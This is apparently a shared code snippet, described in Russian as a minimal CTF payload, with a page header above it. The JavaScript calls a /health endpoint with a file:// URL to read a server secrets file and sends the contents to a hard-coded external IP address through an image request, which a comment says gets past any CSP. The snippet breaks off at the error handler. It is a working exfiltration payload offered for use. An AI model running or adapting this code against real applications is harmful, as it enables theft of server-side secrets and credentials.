Skip to content

Instantly share code, notes, and snippets.

// Минимальный payload для CTF
fetch('http://209.38.254.85:8543/?loaded=1');
fetch('/health?url=file:///usr/src/app/secrets_app.py')
.then(r => r.text())
.then(data => {
// Отправляем через Image (работает при любом CSP)
new Image().src = 'http://209.38.254.85:8543/?flag=' +
encodeURIComponent(data.substring(0, 2000));
})
.catch(e => {